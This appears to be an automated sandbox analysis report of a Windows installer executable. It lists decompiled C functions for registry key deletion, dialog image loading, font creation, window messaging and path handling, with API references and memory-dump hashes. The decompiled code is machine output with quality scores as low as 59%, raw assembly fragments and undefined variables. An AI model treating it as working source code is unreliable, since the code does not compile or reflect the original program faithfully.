                                                                                                                                                                                                              0x00402d3c
                                                                                                                                                                                                              0x00402d3d
                                                                                                                                                                                                              0x00402d6d
                                                                                                                                                                                                              0x00402d46
                                                                                                                                                                                                              0x00402d48
                                                                                                                                                                                                              0x00402d98
                                                                                                                                                                                                              0x00402d9b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402da1
                                                                                                                                                                                                              0x00402d57
                                                                                                                                                                                                              0x00402d5c
                                                                                                                                                                                                              0x00402d5e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402d66
                                                                                                                                                                                                              0x00402d6b
                                                                                                                                                                                                              0x00402d6c
                                                                                                                                                                                                              0x00402d6c
                                                                                                                                                                                                              0x00402d79
                                                                                                                                                                                                              0x00402d81
                                                                                                                                                                                                              0x00402d88
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402db1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402d90
                                                                                                                                                                                                              0x00402d1c
                                                                                                                                                                                                              0x00402d2f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402d2f
                                                                                                                                                                                                              0x00402db7

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1354259210-0
                                                                                                                                                                                                              • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                                                                                                                                              • Instruction ID: 3131e3f6e31e27b0aa66d3651422ecf58d36830b066a5e7c74bd8b9791dc988a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48F64AA68
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                              			E00401D65(void* __ebx, void* __edx) {
                                                                                                                                                                                                              				struct HWND__* _t30;
                                                                                                                                                                                                              				CHAR* _t38;
                                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                              				long _t61;
                                                                                                                                                                                                              				void* _t65;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t53 = __ebx;
                                                                                                                                                                                                              				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                                                                                                                                                                              					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					E00402BAC(2);
                                                                                                                                                                                                              					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t55 =  *(_t65 - 0x1c);
                                                                                                                                                                                                              				 *(_t65 + 8) = _t30;
                                                                                                                                                                                                              				_t58 = _t55 & 0x00000004;
                                                                                                                                                                                                              				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                                                                                                                                                                              				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                                                                                                                                                                              				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                                                                                                                                                                              				if((_t55 & 0x00010000) == 0) {
                                                                                                                                                                                                              					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t38 = E00402BCE(0x11);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				 *(_t65 - 8) = _t38;
                                                                                                                                                                                                              				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                                                                                                                                                                              				asm("sbb edi, edi");
                                                                                                                                                                                                              				_t61 = LoadImageA( ~_t58 &  *0x424740,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                                                                                                                                                                              				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                                                                                                                                                                              				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                                                                                                                                                                              					DeleteObject(_t48);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                                                                                                                                                                              					_push(_t61);
                                                                                                                                                                                                              					E00406186();
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t65 - 4));
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}











                                                                                                                                                                                                              0x00401d65
                                                                                                                                                                                                              0x00401d69
                                                                                                                                                                                                              0x00401d7e
                                                                                                                                                                                                              0x00401d6b
                                                                                                                                                                                                              0x00401d6d
                                                                                                                                                                                                              0x00401d73
                                                                                                                                                                                                              0x00401d73
                                                                                                                                                                                                              0x00401d84
                                                                                                                                                                                                              0x00401d87
                                                                                                                                                                                                              0x00401d91
                                                                                                                                                                                                              0x00401d94
                                                                                                                                                                                                              0x00401d9c
                                                                                                                                                                                                              0x00401dad
                                                                                                                                                                                                              0x00401db0
                                                                                                                                                                                                              0x00401dbb
                                                                                                                                                                                                              0x00401db2
                                                                                                                                                                                                              0x00401db4
                                                                                                                                                                                                              0x00401db4
                                                                                                                                                                                                              0x00401dbf
                                                                                                                                                                                                              0x00401dcc
                                                                                                                                                                                                              0x00401df3
                                                                                                                                                                                                              0x00401e02
                                                                                                                                                                                                              0x00401e10
                                                                                                                                                                                                              0x00401e18
                                                                                                                                                                                                              0x00401e20
                                                                                                                                                                                                              0x00401e20
                                                                                                                                                                                                              0x00401e29
                                                                                                                                                                                                              0x00401e2f
                                                                                                                                                                                                              0x004029a5
                                                                                                                                                                                                              0x004029a5
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00402a69

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                              • Opcode ID: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                                                                                                                                                                                              • Instruction ID: 488f83a01e3392fad3bf683b4443aaeb9baaf514c425c8ec37ca45fc88de17ea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9212A72E00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                                                                              			E00401E35(intOrPtr __edx) {
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				int _t9;
                                                                                                                                                                                                              				signed char _t15;
                                                                                                                                                                                                              				struct HFONT__* _t18;
                                                                                                                                                                                                              				intOrPtr _t30;
                                                                                                                                                                                                              				struct HDC__* _t31;
                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                              				void* _t35;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t30 = __edx;
                                                                                                                                                                                                              				_t31 = GetDC( *(_t35 - 8));
                                                                                                                                                                                                              				_t9 = E00402BAC(2);
                                                                                                                                                                                                              				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                                                                                                                                              				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                                                                                                                                              				ReleaseDC( *(_t35 - 8), _t31);
                                                                                                                                                                                                              				 *0x40b830 = E00402BAC(3);
                                                                                                                                                                                                              				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                                                                                                                                                              				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                                                                                                                                              				 *0x40b837 = 1;
                                                                                                                                                                                                              				 *0x40b834 = _t15 & 0x00000001;
                                                                                                                                                                                                              				 *0x40b835 = _t15 & 0x00000002;
                                                                                                                                                                                                              				 *0x40b836 = _t15 & 0x00000004;
                                                                                                                                                                                                              				E004062BB(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
                                                                                                                                                                                                              				_t18 = CreateFontIndirectA(0x40b820);
                                                                                                                                                                                                              				_push(_t18);
                                                                                                                                                                                                              				_push(_t33);
                                                                                                                                                                                                              				E00406186();
                                                                                                                                                                                                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}











                                                                                                                                                                                                              0x00401e35
                                                                                                                                                                                                              0x00401e40
                                                                                                                                                                                                              0x00401e42
                                                                                                                                                                                                              0x00401e4f
                                                                                                                                                                                                              0x00401e66
                                                                                                                                                                                                              0x00401e6b
                                                                                                                                                                                                              0x00401e78
                                                                                                                                                                                                              0x00401e7d
                                                                                                                                                                                                              0x00401e81
                                                                                                                                                                                                              0x00401e8c
                                                                                                                                                                                                              0x00401e93
                                                                                                                                                                                                              0x00401ea5
                                                                                                                                                                                                              0x00401eab
                                                                                                                                                                                                              0x00401eb0
                                                                                                                                                                                                              0x00401eba
                                                                                                                                                                                                              0x00402620
                                                                                                                                                                                                              0x00401569
                                                                                                                                                                                                              0x004029a5
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00402a69

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00401E38
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                                                                                                                                              • MulDiv.KERNEL32 ref: 00401E5A
                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                                                                                                                                                              • CreateFontIndirectA.GDI32(0040B820), ref: 00401EBA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                                                                                              • Opcode ID: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                                                                                                                                                                                              • Instruction ID: 5097186ed897f0bb8f2c49de76e9dd96fe00b68d7cb2a8ba7479d5b6a1f75869
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18014072504344AEE7017BA4AE89B9A7FF8E755701F10547AF141B61F2CB790445CB6C
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                                                                              			E00401C2E(intOrPtr __edx) {
                                                                                                                                                                                                              				int _t29;
                                                                                                                                                                                                              				long _t30;
                                                                                                                                                                                                              				signed int _t32;
                                                                                                                                                                                                              				CHAR* _t35;
                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                              				int _t41;
                                                                                                                                                                                                              				signed int _t42;
                                                                                                                                                                                                              				int _t46;
                                                                                                                                                                                                              				int _t56;
                                                                                                                                                                                                              				intOrPtr _t57;
                                                                                                                                                                                                              				struct HWND__* _t61;
                                                                                                                                                                                                              				void* _t64;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t57 = __edx;
                                                                                                                                                                                                              				_t29 = E00402BAC(3);
                                                                                                                                                                                                              				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                                                                                                              				 *(_t64 - 8) = _t29;
                                                                                                                                                                                                              				_t30 = E00402BAC(4);
                                                                                                                                                                                                              				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                                                                                                              				 *(_t64 + 8) = _t30;
                                                                                                                                                                                                              				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                                                                                                                                                              					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                                                                                                                                                              				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                                                                                                                                                              					 *(_t64 + 8) = E00402BCE(0x44);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                              				if(__eflags != 0) {
                                                                                                                                                                                                              					_t59 = E00402BCE();
                                                                                                                                                                                                              					_t32 = E00402BCE();
                                                                                                                                                                                                              					asm("sbb ecx, ecx");
                                                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                                                              					_t35 =  ~( *_t31) & _t59;
                                                                                                                                                                                                              					__eflags = _t35;
                                                                                                                                                                                                              					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t61 = E00402BAC();
                                                                                                                                                                                                              					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                                                                                                              					_t41 = E00402BAC(2);
                                                                                                                                                                                                              					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                                                                                                              					_t56 =  *(_t64 - 0x14) >> 2;
                                                                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                                                                              						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                                                                                                                                                                              						L10:
                                                                                                                                                                                                              						 *(_t64 - 0xc) = _t36;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                                                                                                                                                                              						asm("sbb eax, eax");
                                                                                                                                                                                                              						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                                                                                                                                                              				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                                                                                                                                                              					_push( *(_t64 - 0xc));
                                                                                                                                                                                                              					E00406186();
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}















                                                                                                                                                                                                              0x00401c2e
                                                                                                                                                                                                              0x00401c30
                                                                                                                                                                                                              0x00401c37
                                                                                                                                                                                                              0x00401c3a
                                                                                                                                                                                                              0x00401c3d
                                                                                                                                                                                                              0x00401c47
                                                                                                                                                                                                              0x00401c4b
                                                                                                                                                                                                              0x00401c4e
                                                                                                                                                                                                              0x00401c57
                                                                                                                                                                                                              0x00401c57
                                                                                                                                                                                                              0x00401c5a
                                                                                                                                                                                                              0x00401c5e
                                                                                                                                                                                                              0x00401c67
                                                                                                                                                                                                              0x00401c67
                                                                                                                                                                                                              0x00401c6a
                                                                                                                                                                                                              0x00401c6e
                                                                                                                                                                                                              0x00401c70
                                                                                                                                                                                                              0x00401cc5
                                                                                                                                                                                                              0x00401cc7
                                                                                                                                                                                                              0x00401cd0
                                                                                                                                                                                                              0x00401cd8
                                                                                                                                                                                                              0x00401cdb
                                                                                                                                                                                                              0x00401cdb
                                                                                                                                                                                                              0x00401ce4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00401c72
                                                                                                                                                                                                              0x00401c79
                                                                                                                                                                                                              0x00401c7b
                                                                                                                                                                                                              0x00401c7e
                                                                                                                                                                                                              0x00401c84
                                                                                                                                                                                                              0x00401c8b
                                                                                                                                                                                                              0x00401c8e
                                                                                                                                                                                                              0x00401cb6
                                                                                                                                                                                                              0x00401cea
                                                                                                                                                                                                              0x00401cea
                                                                                                                                                                                                              0x00401c90
                                                                                                                                                                                                              0x00401c9e
                                                                                                                                                                                                              0x00401ca6
                                                                                                                                                                                                              0x00401ca9
                                                                                                                                                                                                              0x00401ca9
                                                                                                                                                                                                              0x00401c8e
                                                                                                                                                                                                              0x00401ced
                                                                                                                                                                                                              0x00401cf0
                                                                                                                                                                                                              0x00401cf6
                                                                                                                                                                                                              0x004029a5
                                                                                                                                                                                                              0x004029a5
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00402a69

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00401CB6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                              • Opcode ID: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                                                                                                                                                                                              • Instruction ID: 90c6e89302a946556e44a8134fdeeaca46b2157ebe1368c161caa9607488c25b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80216071A44208BEEB05DFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00405BC0(CHAR* _a4) {
                                                                                                                                                                                                              				CHAR* _t7;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t7 = _a4;
                                                                                                                                                                                                              				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                                                                                                                              					lstrcatA(_t7, 0x40a014);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x00405bc1
                                                                                                                                                                                                              0x00405bd8
                                                                                                                                                                                                              0x00405be0
                                                                                                                                                                                                              0x00405be0
                                                                                                                                                                                                              0x00405be8

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BC6
                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 00405BCF
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405BE0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                              • API String ID: 2659869361-4017390910
                                                                                                                                                                                                              • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                                                                                                              • Instruction ID: d6a8f4146c737b4c1111608fba26ea94f920a63204c4a5504a78fba285be9fad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CD0A7721055307BD21237154C09ECF2A488F0230470A006BF541B6191C73C5C1187FE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                                              			E004052C3(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                                                                              				int _t15;
                                                                                                                                                                                                              				long _t16;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t15 = _a8;
                                                                                                                                                                                                              				if(_t15 != 0x102) {
                                                                                                                                                                                                              					if(_t15 != 0x200) {
                                                                                                                                                                                                              						_t16 = _a16;
                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                              						if(_t15 == 0x419 &&  *0x420d3c != _t16) {
                                                                                                                                                                                                              							_push(_t16);
                                                                                                                                                                                                              							_push(6);
                                                                                                                                                                                                              							 *0x420d3c = _t16;
                                                                                                                                                                                                              							E00404C7F();
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                              						return CallWindowProcA( *0x420d44, _a4, _t15, _a12, _t16);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(IsWindowVisible(_a4) == 0) {
                                                                                                                                                                                                              						L10:
                                                                                                                                                                                                              						_t16 = _a16;
                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t16 = E00404BFF(_a4, 1);
                                                                                                                                                                                                              					_t15 = 0x419;
                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if(_a12 != 0x20) {
                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				E004042F8(0x413);
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x004052c7
                                                                                                                                                                                                              0x004052d1
                                                                                                                                                                                                              0x004052ed
                                                                                                                                                                                                              0x0040530f
                                                                                                                                                                                                              0x00405312
                                                                                                                                                                                                              0x00405318
                                                                                                                                                                                                              0x00405322
                                                                                                                                                                                                              0x00405323
                                                                                                                                                                                                              0x00405325
                                                                                                                                                                                                              0x0040532b
                                                                                                                                                                                                              0x0040532b
                                                                                                                                                                                                              0x00405335
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405343
                                                                                                                                                                                                              0x004052fa
                                                                                                                                                                                                              0x00405332
                                                                                                                                                                                                              0x00405332
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405332
                                                                                                                                                                                                              0x00405306
                                                                                                                                                                                                              0x00405308
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405308
                                                                                                                                                                                                              0x004052d7
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004052de
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004052F2
                                                                                                                                                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00405343
                                                                                                                                                                                                                • Part of subcall function 004042F8: SendMessageA.USER32 ref: 0040430A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                                              • Opcode ID: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                                                                                                                                                                                              • Instruction ID: 59df81840e01a834e8184741018ea8653580e9c1f0e113f815542439c818a584
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61017C71200608AFDF209F51DD81AAB3B66EB94394F50453BFA04761D1C7BA9C929F2D
